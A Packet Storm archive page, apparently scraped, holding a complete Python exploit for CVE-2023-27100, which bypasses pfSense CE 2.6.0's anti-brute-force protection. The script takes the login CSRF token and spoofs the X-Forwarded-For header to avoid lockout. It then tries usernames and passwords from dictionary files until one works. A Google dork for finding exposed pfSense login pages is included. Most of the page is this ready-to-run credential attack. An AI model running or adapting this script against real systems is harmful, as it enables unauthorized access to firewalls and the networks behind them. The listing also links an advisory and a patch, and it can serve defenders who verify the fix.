what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

pfsenseCE 2.6.0 Protection Bypass

pfsenseCE 2.6.0 Protection Bypass
Posted Apr 10, 2023
Authored by FabDotNET

pfsenseCE version 2.6.0 suffers from an anti-brute force protection bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2023-27100
SHA-256 | fa219779bd91ad8359f8cae7dfd47cd12cdef618ad635d9920147a7c024cf0bb

pfsenseCE 2.6.0 Protection Bypass

Change Mirror Download
#!/usr/bin/python3

## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100

# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66

import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning

# Expected Arguments
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))

parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
sys.exit(1)

# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList

# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')


def login(userlogin, userpasswd):
session = requests.session()
r = session.get(url, verify=False)

# Getting CSRF token value
csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
csrftoken = csrftoken.group(1)

# Specifying Headers Value
headerscontent = {
'User-Agent': 'Mozilla/5.0',
'Referer': f"{url}",
'X-Forwarded-For': '42.42.42.42'
}

# POST REQ data
postreqcontent = {
'__csrf_magic': f"{csrftoken}",
'usernamefld': f"{userlogin}",
'passwordfld': f"{userpasswd}",
'login': 'Sign+In'
}

# Sending POST REQ
r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)

# Conditional loops
if r.status_code != 200:
print(f'[*] - Found Valid Credential !!')
print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
sys.exit(0)


# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()

for user in userfile:
user = user.strip()
for passwd in passfile:
passwd = passwd.strip()
login(user, passwd)


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close